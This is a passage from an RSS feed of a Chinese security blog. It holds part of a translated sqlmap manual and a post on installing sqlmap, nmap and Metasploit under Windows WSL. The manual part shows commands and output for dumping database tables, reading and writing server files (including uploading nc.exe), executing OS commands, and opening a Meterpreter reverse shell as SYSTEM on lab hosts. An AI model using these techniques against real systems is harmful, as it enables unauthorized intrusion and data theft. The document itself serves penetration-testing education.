<pre><code>$ python sqlmap.py -u &quot;http://192.168.48.130/sqlmap/mysql/get_int.php?id=1&quot; --schema --batch --exclude-sysdbs
[...]
Database: owasp10
Table: accounts
[4 columns]
+-------------+---------+
| Column | Type |
+-------------+---------+
| cid | int(11) |
| mysignature | text |
| password | text |
| username | text |
+-------------+---------+
Database: owasp10
Table: blogs_table
[4 columns]
+--------------+----------+
| Column | Type |
+--------------+----------+
| date | datetime |
| blogger_name | text |
| cid | int(11) |
| comment | text |
+--------------+----------+
Database: owasp10
Table: hitlog
[6 columns]
+----------+----------+
| Column | Type |
+----------+----------+
| date | datetime |
| browser | text |
| cid | int(11) |
| hostname | text |
| ip | text |
| referer | text |
+----------+----------+
Database: testdb
Table: users
[3 columns]
+---------+---------------+
| Column | Type |
+---------+---------------+
| id | int(11) |
| name | varchar(500) |
| surname | varchar(1000) |
+---------+---------------+
[...]</code></pre>
<h2>获取表中数据个数</h2>
<p>参数：&#8211;count</p>
<p>有时候用户只想获取表中的数据个数而不是具体的内容，那么就可以使用这个参数。</p>
<p>列举一个Microsoft SQL Server例子：</p>
<pre><code>$ python sqlmap.py -u &quot;http://192.168.21.129/sqlmap/mssql/iis/get_int.asp?id=1&quot; --count -D testdb
[...]
Database: testdb
+----------------+---------+
| Table | Entries |
+----------------+---------+
| dbo.users | 4 |
| dbo.users_blob | 2 |
+----------------+---------+</code></pre>
<h2>获取整个表的数据</h2>
<p>参数：&#8211;dump,-C,-T,-D,&#8211;start,&#8211;stop,&#8211;first,&#8211;last</p>
<p>如果当前管理员有权限读取数据库其中的一个表的话，那么就能获取真个表的所有内容。</p>
<p>使用-D,-T参数指定想要获取哪个库的哪个表，不适用-D参数时，默认使用当前库。</p>
<p>列举一个Firebird的例子：</p>
<pre><code>$ python sqlmap.py -u &quot;http://192.168.136.131/sqlmap/firebird/get_int.php?id=1&quot; --dump -T users
[...]
Database: Firebird_masterdb
Table: USERS
[4 entries]
+----+--------+------------+
| ID | NAME | SURNAME |
+----+--------+------------+
| 1 | luther | blisset |
| 2 | fluffy | bunny |
| 3 | wu | ming |
| 4 | NULL | nameisnull |
+----+--------+------------+</code></pre>
<p>可以获取指定库中的所有表的内容，只用-dump跟-D参数（不使用-T与-C参数）。</p>
<p>也可以用-dump跟-C获取指定的字段内容。</p>
<p>sqlmap为每个表生成了一个CSV文件。</p>
<p>如果你只想获取一段数据，可以使用&#8211;start和&#8211;stop参数，例如，你只想获取第一段数据可hi使用&#8211;stop 1，如果想获取第二段与第三段数据，使用参数 &#8211;start 1 &#8211;stop 3。</p>
<p>也可以用&#8211;first与&#8211;last参数，获取第几个字符到第几个字符的内容，如果你想获取字段中地三个字符到第五个字符的内容，使用&#8211;first 3 &#8211;last 5，只在盲注的时候使用，因为其他方式可以准确的获取注入内容，不需要一个字符一个字符的猜解。</p>
<h2>获取所有数据库表的内容</h2>
<p>参数：&#8211;dump-all,&#8211;exclude-sysdbs</p>
<p>使用&#8211;dump-all参数获取所有数据库表的内容，可同时加上&#8211;exclude-sysdbs只获取用户数据库的表，需要注意在Microsoft SQL Server中master数据库没有考虑成为一个系统数据库，因为有的管理员会把他当初用户数据库一样来使用它。</p>
<h2>搜索字段，表，数据库</h2>
<p>参数：&#8211;search,-C,-T,-D</p>
<p>&#8211;search可以用来寻找特定的数据库名，所有数据库中的特定表名，所有数据库表中的特定字段。</p>
<p>可以在一下三种情况下使用：</p>
<pre><code>-C后跟着用逗号分割的列名，将会在所有数据库表中搜索指定的列名。
-T后跟着用逗号分割的表名，将会在所有数据库中搜索指定的表名
-D后跟着用逗号分割的库名，将会在所有数据库中搜索指定的库名。</code></pre>
<h2>运行自定义的SQL语句</h2>
<p>参数：&#8211;sql-query,&#8211;sql-shell</p>
<p>sqlmap会自动检测确定使用哪种SQL注入技术，如何插入检索语句。</p>
<p>如果是SELECT查询语句，sqlap将会输出结果。如果是通过SQL注入执行其他语句，需要测试是否支持多语句执行SQL语句。</p>
<p>列举一个Mircrosoft SQL Server 2000的例子：</p>
<pre><code>$ python sqlmap.py -u &quot;http://192.168.136.131/sqlmap/mssql/get_int.php?id=1&quot; --sql-query &quot;SELECT 'foo'&quot; -v 1
[...]
[hh:mm:14] [INFO] fetching SQL SELECT query output: 'SELECT 'foo''
[hh:mm:14] [INFO] retrieved: foo
SELECT 'foo': 'foo'
$ python sqlmap.py -u &quot;http://192.168.136.131/sqlmap/mssql/get_int.php?id=1&quot; --sql-query &quot;SELECT 'foo', 'bar'&quot; -v 2
[...]
[hh:mm:50] [INFO] fetching SQL SELECT query output: 'SELECT 'foo', 'bar''
[hh:mm:50] [INFO] the SQL query provided has more than a field. sqlmap will now unpack it into
distinct queries to be able to retrieve the output even if we are going blind
[hh:mm:50] [DEBUG] query: SELECT ISNULL(CAST((CHAR(102)+CHAR(111)+CHAR(111)) AS VARCHAR(8000)),
(CHAR(32)))
[hh:mm:50] [INFO] retrieved: foo
[hh:mm:50] [DEBUG] performed 27 queries in 0 seconds
[hh:mm:50] [DEBUG] query: SELECT ISNULL(CAST((CHAR(98)+CHAR(97)+CHAR(114)) AS VARCHAR(8000)),
(CHAR(32)))
[hh:mm:50] [INFO] retrieved: bar
[hh:mm:50] [DEBUG] performed 27 queries in 0 seconds
SELECT 'foo', 'bar': 'foo, bar'</code></pre>
<h1>爆破</h1>
<hr />
<h2>暴力破解表名</h2>
<p>参数：&#8211;common-tables</p>
<p>当使用&#8211;tables无法获取到数据库的表时，可以使用此参数。</p>
<p>通常是如下情况：</p>
<pre><code>1、MySQL数据库版本小于5.0，没有information_schema表。
2、数据库是Microssoft Access，系统表MSysObjects是不可读的（默认）。
3、当前用户没有权限读取系统中保存数据结构的表的权限。</code></pre>
<p>暴力破解的表在txt/common-tables.txt文件中，你可以自己添加。</p>
<p>列举一个MySQL 4.1的例子：</p>
<pre><code>$ python sqlmap.py -u &quot;http://192.168.136.129/mysql/get_int_4.php?id=1&quot; --common-tables -D testdb --banner
[...]
[hh:mm:39] [INFO] testing MySQL
[hh:mm:39] [INFO] confirming MySQL
[hh:mm:40] [INFO] the back-end DBMS is MySQL
[hh:mm:40] [INFO] fetching banner
web server operating system: Windows
web application technology: PHP 5.3.1, Apache 2.2.14
back-end DBMS operating system: Windows
back-end DBMS: MySQL &amp;lt; 5.0.0
banner: '4.1.21-community-nt'
[hh:mm:40] [INFO] checking table existence using items from '/software/sqlmap/txt/common-tables.txt'
[hh:mm:40] [INFO] adding words used on web page to the check list
please enter number of threads? [Enter for 1 (current)] 8
[hh:mm:43] [INFO] retrieved: users
Database: testdb
[1 table]
+-------+
| users |
+-------+</code></pre>
<h2>暴力破解列名</h2>
<p>参数：&#8211;common-columns</p>
<p>与暴力破解表名一样，暴力跑的列名在txt/common-columns.txt中。</p>
<h2>用户自定义函数注入</h2>
<p>参数：&#8211;udf-inject,&#8211;shared-lib</p>
<p>你可以通过编译MySQL注入你自定义的函数（UDFs）或PostgreSQL在windows中共享库，DLL，或者Linux/Unix中共享对象，sqlmap将会问你一些问题，上传到服务器数据库自定义函数，然后根据你的选择执行他们，当你注入完成后，sqlmap将会移除它们。</p>
<h2>系统文件操作</h2>
<p>从数据库服务器中读取文件<br />参数：&#8211;file-read</p>
<p>当数据库为MySQL，PostgreSQL或Microsoft SQL Server，并且当前用户有权限使用特定的函数。读取的文件可以是文本也可以是二进制文件。</p>
<p>列举一个Microsoft SQL Server 2005的例子：</p>
<pre><code>$ python sqlmap.py -u &quot;http://192.168.136.129/sqlmap/mssql/iis/get_str2.asp?name=luther&quot; \
--file-read &quot;C:/example.exe&quot; -v 1
[...]
[hh:mm:49] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2000
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft SQL Server 2005
[hh:mm:50] [INFO] fetching file: 'C:/example.exe'
[hh:mm:50] [INFO] the SQL query provided returns 3 entries
C:/example.exe file saved to: '/software/sqlmap/output/192.168.136.129/files/C__example.exe'
[...]
$ ls -l output/192.168.136.129/files/C__example.exe
-rw-r--r-- 1 inquis inquis 2560 2011-MM-DD hh:mm output/192.168.136.129/files/C__example.exe
$ file output/192.168.136.129/files/C__example.exe
output/192.168.136.129/files/C__example.exe: PE32 executable for MS Windows (GUI) Intel
80386 32-bit</code></pre>
<h2>把文件上传到数据库服务器中</h2>
<p>参数：&#8211;file-write,&#8211;file-dest</p>
<p>当数据库为MySQL，PostgreSQL或Microsoft SQL Server，并且当前用户有权限使用特定的函数。上传的文件可以是文本也可以是二进制文件。</p>
<p>列举一个MySQL的例子：</p>
<pre><code>$ file /software/nc.exe.packed
/software/nc.exe.packed: PE32 executable for MS Windows (console) Intel 80386 32-bit
$ ls -l /software/nc.exe.packed
-rwxr-xr-x 1 inquis inquis 31744 2009-MM-DD hh:mm /software/nc.exe.packed
$ python sqlmap.py -u &quot;http://192.168.136.129/sqlmap/mysql/get_int.aspx?id=1&quot; --file-write \
&quot;/software/nc.exe.packed&quot; --file-dest &quot;C:/WINDOWS/Temp/nc.exe&quot; -v 1
[...]
[hh:mm:29] [INFO] the back-end DBMS is MySQL
web server operating system: Windows 2003 or 2008
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: MySQL &amp;gt;= 5.0.0
[...]
do you want confirmation that the file 'C:/WINDOWS/Temp/nc.exe' has been successfully
written on the back-end DBMS file system? [Y/n] y
[hh:mm:52] [INFO] retrieved: 31744
[hh:mm:52] [INFO] the file has been successfully written and its size is 31744 bytes,
same size as the local file '/software/nc.exe.packed'</code></pre>
<h2>运行任意操作系统命令</h2>
<p>参数：&#8211;os-cmd,&#8211;os-shell</p>
<p>当数据库为MySQL，PostgreSQL或Microsoft SQL Server，并且当前用户有权限使用特定的函数。</p>
<p>在MySQL、PostgreSQL，sqlmap上传一个二进制库，包含用户自定义的函数，sys_exec()和sys_eval()。</p>
<p>那么他创建的这两个函数可以执行系统命令。在Microsoft SQL Server，sqlmap将会使用xp_cmdshell存储过程，如果被禁（在Microsoft SQL Server 2005及以上版本默认禁制），sqlmap会重新启用它，如果不存在，会自动创建。</p>
<p>列举一个PostgreSQL的例子：</p>
<pre><code>$ python sqlmap.py -u &quot;http://192.168.136.131/sqlmap/pgsql/get_int.php?id=1&quot; \
--os-cmd id -v 1
[...]
web application technology: PHP 5.2.6, Apache 2.2.9
back-end DBMS: PostgreSQL
[hh:mm:12] [INFO] fingerprinting the back-end DBMS operating system
[hh:mm:12] [INFO] the back-end DBMS operating system is Linux
[hh:mm:12] [INFO] testing if current user is DBA
[hh:mm:12] [INFO] detecting back-end DBMS version from its banner
[hh:mm:12] [INFO] checking if UDF 'sys_eval' already exist
[hh:mm:12] [INFO] checking if UDF 'sys_exec' already exist
[hh:mm:12] [INFO] creating UDF 'sys_eval' from the binary UDF file
[hh:mm:12] [INFO] creating UDF 'sys_exec' from the binary UDF file
do you want to retrieve the command standard output? [Y/n/a] y
command standard output: 'uid=104(postgres) gid=106(postgres) groups=106(postgres)'
[hh:mm:19] [INFO] cleaning up the database management system
do you want to remove UDF 'sys_eval'? [Y/n] y
do you want to remove UDF 'sys_exec'? [Y/n] y
[hh:mm:23] [INFO] database management system cleanup finished
[hh:mm:23] [WARNING] remember that UDF shared object files saved on the file system can
only be deleted manually</code></pre>
<p>用&#8211;os-shell参数也可以模拟一个真实的shell，可以输入你想执行的命令。</p>
<p>当不能执行多语句的时候（比如php或者asp的后端数据库为MySQL时），仍然可能使用INTO OUTFILE写进可写目录，来创建一个web后门。支持的语言：</p>
<pre><code>1、ASP
2、ASP.NET
3、JSP
4、PHP</code></pre>
<h2>Meterpreter配合使用</h2>
<p>参数：&#8211;os-pwn,&#8211;os-smbrelay,&#8211;os-bof,&#8211;priv-esc,&#8211;msf-path,&#8211;tmp-path</p>
<p>当数据库为MySQL，PostgreSQL或Microsoft SQL Server，并且当前用户有权限使用特定的函数，可以在数据库与攻击者直接建立TCP连接，这个连接可以是一个交互式命令行的Meterpreter会话，sqlmap根据Metasploit生成shellcode，并有四种方式执行它：</p>
<pre><code>1、通过用户自定义的sys_bineval()函数在内存中执行Metasplit的shellcode，支持MySQL和PostgreSQL数据库，参数：--os-pwn。
2、通过用户自定义的函数上传一个独立的payload执行，MySQL和PostgreSQL的sys_exec()函数，Microsoft SQL Server的xp_cmdshell()函数，参数：--os-pwn。
3、通过SMB攻击(MS08-068)来执行Metasploit的shellcode，当sqlmap获取到的权限足够高的时候（Linux/Unix的uid=0，Windows是Administrator），--os-smbrelay。
4、通过溢出Microsoft SQL Server 2000和2005的sp_replwritetovarbin存储过程(MS09-004)，在内存中执行Metasploit的payload，参数：--os-bof</code></pre>
<p>列举一个MySQL例子：</p>
<pre><code>$ python sqlmap.py -u &quot;http://192.168.136.129/sqlmap/mysql/iis/get_int_55.aspx?id=1&quot; --os-pwn --msf-path /software/metasploit
[...]
[hh:mm:31] [INFO] the back-end DBMS is MySQL
web server operating system: Windows 2003
web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 6.0
back-end DBMS: MySQL 5.0
[hh:mm:31] [INFO] fingerprinting the back-end DBMS operating system
[hh:mm:31] [INFO] the back-end DBMS operating system is Windows
how do you want to establish the tunnel?
[1] TCP: Metasploit Framework (default)
[2] ICMP: icmpsh - ICMP tunneling
&amp;gt;
[hh:mm:32] [INFO] testing if current user is DBA
[hh:mm:32] [INFO] fetching current user
what is the back-end database management system architecture?
[1] 32-bit (default)
[2] 64-bit
&amp;gt;
[hh:mm:33] [INFO] checking if UDF 'sys_bineval' already exist
[hh:mm:33] [INFO] checking if UDF 'sys_exec' already exist
[hh:mm:33] [INFO] detecting back-end DBMS version from its banner
[hh:mm:33] [INFO] retrieving MySQL base directory absolute path
[hh:mm:34] [INFO] creating UDF 'sys_bineval' from the binary UDF file
[hh:mm:34] [INFO] creating UDF 'sys_exec' from the binary UDF file
how do you want to execute the Metasploit shellcode on the back-end database underlying
operating system?
[1] Via UDF 'sys_bineval' (in-memory way, anti-forensics, default)
[2] Stand-alone payload stager (file system way)
&amp;gt;
[hh:mm:35] [INFO] creating Metasploit Framework multi-stage shellcode
which connection type do you want to use?
[1] Reverse TCP: Connect back from the database host to this machine (default)
[2] Reverse TCP: Try to connect back from the database host to this machine, on all ports
between the specified and 65535
[3] Bind TCP: Listen on the database host for a connection
&amp;gt;
which is the local address? [192.168.136.1]
which local port number do you want to use? [60641]
which payload do you want to use?
[1] Meterpreter (default)
[2] Shell
[3] VNC
&amp;gt;
[hh:mm:40] [INFO] creation in progress ... done
[hh:mm:43] [INFO] running Metasploit Framework command line interface locally, please wait..
_
| | o
_ _ _ _ _|_ __, , _ | | __ _|_
/ |/ |/ | |/ | / | / \_|/ \_|/ / \_| |
| | |_/|__/|_/\_/|_/ \/ |__/ |__/\__/ |_/|_/
/|
\|
=[ metasploit v3.7.0-dev [core:3.7 api:1.0]
+ -- --=[ 674 exploits - 351 auxiliary
+ -- --=[ 217 payloads - 27 encoders - 8 nops
=[ svn r12272 updated 4 days ago (2011.04.07)
PAYLOAD =&amp;gt; windows/meterpreter/reverse_tcp
EXITFUNC =&amp;gt; thread
LPORT =&amp;gt; 60641
LHOST =&amp;gt; 192.168.136.1
[*] Started reverse handler on 192.168.136.1:60641
[*] Starting the payload handler...
[hh:mm:48] [INFO] running Metasploit Framework shellcode remotely via UDF 'sys_bineval',
please wait..
[*] Sending stage (749056 bytes) to 192.168.136.129
[*] Meterpreter session 1 opened (192.168.136.1:60641 -&amp;gt; 192.168.136.129:1689) at Mon Apr 11
hh:mm:52 +0100 2011
meterpreter &amp;gt; Loading extension espia...success.
meterpreter &amp;gt; Loading extension incognito...success.
meterpreter &amp;gt; [-] The 'priv' extension has already been loaded.
meterpreter &amp;gt; Loading extension sniffer...success.
meterpreter &amp;gt; System Language : en_US
OS : Windows .NET Server (Build 3790, Service Pack 2).
Computer : W2K3R2
Architecture : x86
Meterpreter : x86/win32
meterpreter &amp;gt; Server username: NT AUTHORITY\SYSTEM
meterpreter &amp;gt; ipconfig
MS TCP Loopback interface
Hardware MAC: 00:00:00:00:00:00
IP Address : 127.0.0.1
Netmask : 255.0.0.0
Intel(R) PRO/1000 MT Network Connection
Hardware MAC: 00:0c:29:fc:79:39
IP Address : 192.168.136.129
Netmask : 255.255.255.0
meterpreter &amp;gt; exit
[*] Meterpreter session 1 closed. Reason: User exit</code></pre>
<p>默认情况下MySQL在Windows上以SYSTEM权限运行，PostgreSQL在Windows与Linux中是低权限运行，Microsoft SQL Server 2000默认是以SYSTEM权限运行，Microsoft SQL Server 2005与2008大部分是以NETWORK SERVICE有时是LOCAL SERVICE。</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>win10 bash安装sqlmap nmap msf</title>
		<link>/tools/337.html</link>
		
		<dc:creator><![CDATA[Y4er]]></dc:creator>
		<pubDate>Thu, 25 Jan 2018 15:25:21 +0000</pubDate>
				<category><![CDATA[工具分享]]></category>
		<category><![CDATA[bash]]></category>
		<category><![CDATA[msf]]></category>
		<category><![CDATA[nmap]]></category>
		<category><![CDATA[sqlmap]]></category>
		<guid isPermaLink="false">/?p=39</guid>

					<description><![CDATA[前言 刚放假回来，电脑上的东西乱七八糟的，就直接重装了系统。而后学习python3.6，但是作为一名合格的白帽子，电脑上没有sqlmap合适吗？于是便想装一个sqlmap，但是sq...]]></description>
										<content:encoded><![CDATA[<h1>前言</h1>
<p>刚放假回来，电脑上的东西乱七八糟的，就直接重装了系统。<br />而后学习python3.6，但是作为一名合格的白帽子，电脑上没有<span class="wpcom_tag_link"><a href="/tags/sqlmap" title="sqlmap" target="_blank">sqlmap</a></span>合适吗？于是便想装一个sqlmap，但是sqlmap需要的是python2.7的环境，这就很尴尬了。我可不想在电脑上装py3和py2共存，因为会有很多共存的问题。我总不能为了这个再去装虚拟机吧。于是便有了我的<span class="wpcom_tag_link"><a href="/tags/bash" title="bash" target="_blank">bash</a></span> for win10。</p>
<h1>bash安装</h1>
<p>首先，win10要激活，然后在<code>开始</code>&#8211;<code>设置</code>&#8211;<code>更新和安全</code>&#8211;<code>针对开发人员</code>&#8211;<code>开发人员模式</code>。如图：<br /><img src="https://ws1.sinaimg.cn/large/006xriynly1fnsv18aokwj30zm0rtmyw.jpg" alt="image" title="image"></p>
<p>其次，<code>控制面板</code>&#8211;<code>程序</code>&#8211;<code>启用和关闭Windows功能</code> 勾选<code>适用于Linux的Windows子系统</code><br /><img src="https://ws1.sinaimg.cn/large/006xriynly1fnsv4mit14j30dg0do754.jpg" alt="image" title="image"></p>
<p>然后会要求你重启，重启一下。</p>
<p>重启之后打开Windows应用商店，搜索<code>bash</code>，然后会出现下图：<br /><img src="https://ws1.sinaimg.cn/large/006xriynly1fnsv7h9el3j30zm0rt0us.jpg" alt="image" title="image"><br />选择Ubuntu安装即可。然后打开Ubuntu会让你设置用户名和密码，需牢记。</p>
<h1>换源及更新</h1>
<p>首先需要切换到root权限。</p>
<pre><code>sudo su</code></pre>
<p>如图：<img src="https://ws1.sinaimg.cn/large/006xriynly1fnsvbu2iqlj30xz0hr3yo.jpg" alt="image" title="image"><br />然后备份原来的源文件</p>
<pre><code>cd /etc/apt/</code></pre>
<p>然后会显示下面的源文件<code>sources.list</code> <br />输入命令 <br /><code>cp sources.list sources.list.bak </code><br />就是将<code>sources.list</code>备份到<code>sources.list.bak</code></p>
<p>然后<code>vim sources.list</code><br />把下面的内容粘贴到源文件里保存。</p>
<pre><code>    deb http://mirrors.aliyun.com/ubuntu/ xenial main restricted universe multiverse
    deb http://mirrors.aliyun.com/ubuntu/ xenial-security main restricted universe multiverse
    deb http://mirrors.aliyun.com/ubuntu/ xenial-updates main restricted universe multiverse
    deb http://mirrors.aliyun.com/ubuntu/ xenial-backports main restricted universe multiverse
    ##测试版源
    deb http://mirrors.aliyun.com/ubuntu/ xenial-proposed main restricted universe multiverse
    # 源码
    deb-src http://mirrors.aliyun.com/ubuntu/ xenial main restricted universe multiverse
    deb-src http://mirrors.aliyun.com/ubuntu/ xenial-security main restricted universe multiverse
    deb-src http://mirrors.aliyun.com/ubuntu/ xenial-updates main restricted universe multiverse
    deb-src http://mirrors.aliyun.com/ubuntu/ xenial-backports main restricted universe multiverse
    ##测试版源
    deb-src http://mirrors.aliyun.com/ubuntu/ xenial-proposed main restricted universe multiverse
    # Canonical 合作伙伴和附加
    deb http://archive.canonical.com/ubuntu/ xenial partner
    deb http://extras.ubuntu.com/ubuntu/ xenial main </code></pre>
<p>更新源和软件</p>
<pre><code>   sudo apt-get update 更新源
   sudo apt-get upgrade 更新软件 </code></pre>
<h1>安装sqlmap</h1>
<p>首先先安装python2.7<br /><code>apt-get install python</code><br />然后安装sqlmap<br /><code>apt-get install sqlmap</code><br />上图<img src="https://ws1.sinaimg.cn/large/006xriynly1fnsvneodu0j30wx0hrdhb.jpg" alt="image" title="image"></p>
<h1>安装<span class="wpcom_tag_link"><a href="/tags/nmap" title="nmap" target="_blank">nmap</a></span></h1>
<p><code>apt-get install nmap</code><br /><img src="https://ws1.sinaimg.cn/large/006xriynly1fnsvrncbgbj30wx0hr40i.jpg" alt="image" title="image"></p>
<h1>安装<span class="wpcom_tag_link"><a href="/tags/msf" title="msf" target="_blank">msf</a></span></h1>
<pre><code>curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb &gt; msfinstall &amp;&amp; \
  chmod 755 msfinstall &amp;&amp; \
  ./msfinstall</code></pre>
<p><img src="https://ws1.sinaimg.cn/large/006xriynly1fnsvtaldy8j30wx0hrq3e.jpg" alt="image" title="image"></p>
]]></content:encoded>
					
		
		
			</item>
	</channel>
</rss>
